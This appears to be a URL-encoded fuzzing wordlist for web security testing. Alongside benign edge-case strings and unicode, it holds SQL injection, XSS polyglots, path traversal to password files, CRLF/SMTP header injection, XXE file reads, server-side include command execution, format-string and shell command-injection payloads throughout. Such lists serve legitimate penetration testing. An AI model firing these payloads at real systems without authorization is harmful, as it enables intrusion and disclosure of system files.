%21%40%24%25%5E%26%2A%28%29_%2B%3D-%5B%5D%7B%60%7D%7E%5C%7C%3B%27%3A%22%3F/%3E.%3C%2C%23
%23%2C%3C.%3E/%3F%22%3A%27%3B%7C%5C%7E%7D%60%7B%5D%5B-%3D%2B_%29%28%2A%26%5E%25%24%40%21
-1
0
1
null
true
false
%2500
%2500%2500
NaN
SLEEP%2830%29%20/%2A%E2%80%98%20or%20SLEEP%2830%29%20or%20%E2%80%98%E2%80%9C%20or%20SLEEP%2830%29%20or%20%E2%80%9C%2A/
SELECT%201%2C2%2CIF%28SUBSTR%28%40%40version%2C1%2C1%29%3C5%2CBENCHMARK%2815000000%2CSHA1%280xDE7EC71F1%29%29%2CSLEEP%281%29%29/%2A%27XOR%28IF%28SUBSTR%28%40%40version%2C1%2C1%29%3C5%2CBENCHMARK%2815000000%2CSHA1%280xDE7EC71F1%29%29%2CSLEEP%2830%29%29%29OR%27%7C%22XOR%28IF%28SUBSTR%28%40%40version%2C1%2C1%29%3C5%2CBENCHMARK%2815000000%2CSHA1%280xDE7EC71F1%29%29%2C%E2%80%8BSLEEP%2830%29%29%29OR%22%2A/%20FROM%20some_table%20WHERE%20ex%20%3D%20ample
javascript%3A//%27/%3C/title%3E%3C/style%3E%3C/textarea%3E%3C/script%3E--%3E%3Cp%22%20onclick%3Dalert%28%29//%3E%2A/alert%28%29/%2A
javascript%3A//%27//%22%20--%3E%3C/textarea%3E%3C/style%3E%3C/script%3E%3C/title%3E%3Cb%20onclick%3D%20alert%28%29//%3E%2A/alert%28%29/%2A
%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/SCRIPT%3E
%27--
%22--
%27%20or%209%3D9--
%22%20or%209%3D9--
%20or%209%3D9--
%27%20or%20%279%27%3D%279%27--
%27%20or%20%279%27%3D%279%27%23
%29%20or%20%28%27x%27%3D%27x
%29%20or%20%28%22x%22%3D%22x
x%27%20or%20%27x%27%3D%27x
x%22%20or%20%22x%22%3D%22x
%20union%20all%20select%20%40%40version--
%27%20or%201%3D1%20or%20%27%27%3D%27
%22%20or%209%3D9%20or%20%22%22%3D%22
benchmark%2815000000%2CMD5%281%29%29%23
1%29%29%20or%20benchmark%2815000000%2CMD5%281%29%29%23
1%29%20or%20benchmark%2815000000%2CMD5%281%29%29%23
1%22%20or%20benchmark%2815000000%2CMD5%281%29%29%23
1%27%20or%20benchmark%2815000000%2CMD5%281%29%29%23
1%22%20or%20sleep%2830%29%23
1%27%20or%20sleep%2830%29%23
1%29%20or%20sleep%2830%29%23
1%29%29%20or%20pg_sleep%2830%29--
1%29%20or%20pg_sleep%2830%29--
1%22%20or%20pg_sleep%2830%29--
1%27%20or%20pg_sleep%2830%29--
pg_sleep%2830%29--
1%3Bwaitfor%20delay%20%270%3A0%3A30%27--
1%27%3Bwaitfor%20delay%20%270%3A0%3A30%27--
1%22%3Bwaitfor%20delay%20%270%3A0%3A30%27--
1%29%3Bwaitfor%20delay%20%270%3A0%3A30%27--
1%29%29%3Bwaitfor%20delay%20%270%3A0%3A30%27--
x%27%22%3E%3CSVg/oNLoad%3Dprompt%284%29%3E
x%E2%80%9D%3E%3CSVg/oNLoad%3Dprompt%284%29%3E
%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Bjavascript%3Aalert%281%29%22/%3E
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd%2500
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/etc%5C/passwd
%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D
../../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../boot.ini
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//windows//win.ini
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vd2luZG93cy93aW4uaW5p
%250d%250aEvilHeader%3A%2520ThisShouldntExist%250d%250a
%250d%250aContent-Type%3A%20text/html%250d%250aHTTP/1.1%20200%20OK%250d%250aContent-Type%3A%20text/html%250d%250a%250d%250a%253Chtml%253EEvil%20content%253C/html%253E
%250d%250aDATA%250d%250afoo%250d%250a%252e%250d%250aMAIL%2BFROM%3A%2Bpentest%40coalfire.com%250d%250aRCPT%2BTO%3A%2Bpentest%40coalfire.com%250d%250aDATA%250d%250aFrom%3A%2Bpentest%40coalfire.com%250d%250aTo%3A%2Bpentest%40coalfire.com%250d%250aSubject%3A%2Btest%250d%250afoo%250d%250a%252e%250d%250a
%3C%21%5BCDATA%5B%3Ctest%3E%3C/test%3E%5D%5D%3E
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A////etc/passwd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C/foo%3E
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A//c%3A/boot.ini%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C/foo%3E
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A//c%3A/windows/win.ini%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C/foo%3E
count%28/child%3A%3Anode%28%29%29
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3Cfoo%3E%3C%21%5BCDATA%5B%27%20or%201%3D1%20or%20%27%27%3D%27%5D%5D%3E%3C/foof%3E
%3Cpre%3E%3C%21--%23exec%20cmd%3D%22ls%22%20--%3E%3C/pre%3E
%3Cpre%3E%3C%21--%23exec%20cmd%3D%22dir%22%20--%3E%3C/pre%3E
%3C%21--%23echo%20var%3D%22DOCUMENT_URI%22%20--%3E
%3C%21--%23echo%20var%3D%22DOCUMENT_NAME%22%20--%3E
%25u003c
%25u003e
%25u0022
%5Cu0022
%5Cu003c
%5Cu003e
eval%28%22while%281%29%3B%22%29
%7B%22%5Cx00%22%3A0%7D
%7B%221%22%3A0%7D
%5B%5D
%7B%7D
%25p%25p%25p%25p
%25x%25x%25x%25x
%25d%25d%25d%25d
%25s%25s%25s%25s
%25n%25n%25n%25n
%3Becho%20coalfire
%26%26%20echo%20coalfire
%26%20echo%20coalfire
%60echo%20coalfire%60
%C5%93%E2%88%91%C2%B4%C2%AE%E2%80%A0%C2%A5%C2%A8%CB%86%C3%B8%CF%80%E2%80%9C%E2%80%98
%E2%85%9B%E2%85%9C%E2%85%9D%E2%85%9E
%D0%81%D0%82%D0%83%D0%84%D0%85%D0%86%D0%87%D0%88
%E2%81%B0%E2%81%B4%E2%81%B5%E2%82%80%E2%82%81%E2%82%82
%E7%94%B0%E4%B8%AD%E3%81%95%E3%82%93%E3%81%AB%E3%81%82%E3%81%92%E3%81%A6%E4%B8%8B%E3%81%95%E3%81%84
%EC%82%AC%ED%9A%8C%EA%B3%BC%ED%95%99%EC%9B%90%20%EC%96%B4%ED%95%99%EC%97%B0%EA%B5%AC%EC%86%8C
%28%EF%BE%89%E0%B2%A5%E7%9B%8A%E0%B2%A5%EF%BC%89%EF%BE%89%EF%BB%BF%20%E2%94%BB%E2%94%81%E2%94%BB
%E2%9D%A4%EF%B8%8F%20%F0%9F%92%94%20%F0%9F%92%8C%20%F0%9F%92%95%20%F0%9F%92%9E%20%F0%9F%92%93%20%F0%9F%92%97%20%F0%9F%92%96%20%F0%9F%92%98%20%F0%9F%92%9D%20%F0%9F%92%9F%20%F0%9F%92%9C%20%F0%9F%92%9B%20%F0%9F%92%9A%20%F0%9F%92%99
0%EF%B8%8F%E2%83%A3%201%EF%B8%8F%E2%83%A3%202%EF%B8%8F%E2%83%A3%203%EF%B8%8F%E2%83%A3%204%EF%B8%8F%E2%83%A3%20
%D9%85%D8%A7%2C%20%D9%8A%D8%B0%D9%83%D8%B1%20%D8%A7%D8%A7%D9%84%D8%A5%D8%B7%D9%84%D8%A7%D9%82%20%D8%B9%D9%84%20%D8%A5%D9%8A%D9%88
test%E2%80%AA
%E2%80%ABtest%E2%80%AB
%00%07
test
I%CC%97%CC%98%CC%A6%CD%9Dn%CD%87%CD%87%CD%99v%CC%AE%CC%ABok%CC%B2%CC%AB%CC%99%CD%88i%CC%96%CD%99%CC%AD%CC%B9%CC%A0%CC%9En%CC%A1%CC%BB%CC%AE%CC%A3%CC%BAg%CC%B2%CD%88%CD%99%CC%AD%CD%99%CC%AC%CD%8E%20%CC%B0t%CD%94%CC%A6h%CC%9E%CC%B2e%CC%A2%CC%A4%20%CD%8D%CC%AC%CC%B2%CD%96f%CC%B4%CC%98%CD%95%CC%A3%C3%A8%CD%96%E1%BA%B9%CC%A5%CC%A9l%CD%96%CD%94%CD%9Ai%CD%93%CD%9A%CC%A6%CD%A0n%CD%96%CD%8D%CC%97%CD%93%CC%B3%CC%AEg%CD%8D%20%CC%A8o%CD%9A%CC%AA%CD%A1f%CC%98%CC%A3%CC%AC%20%CC%96%CC%98%CD%96%CC%9F%CD%99%CC%AEc%D2%89%CD%94%CC%AB%CD%96%CD%93%CD%87%CD%96%CD%85h%CC%B5%CC%A4%CC%A3%CD%9A%CD%94%C3%A1%CC%97%CC%BC%CD%95%CD%85o%CC%BC%CC%A3%CC%A5s%CC%B1%CD%88%CC%BA%CC%96%CC%A6%CC%BB%CD%A2.%CC%9B%CC%96%CC%9E%CC%A0%CC%AB%CC%B0
%CB%99%C9%90nb%E1%B4%89l%C9%90%20%C9%90u%C6%83%C9%90%C9%AF%20%C7%9D%C9%B9olop%20
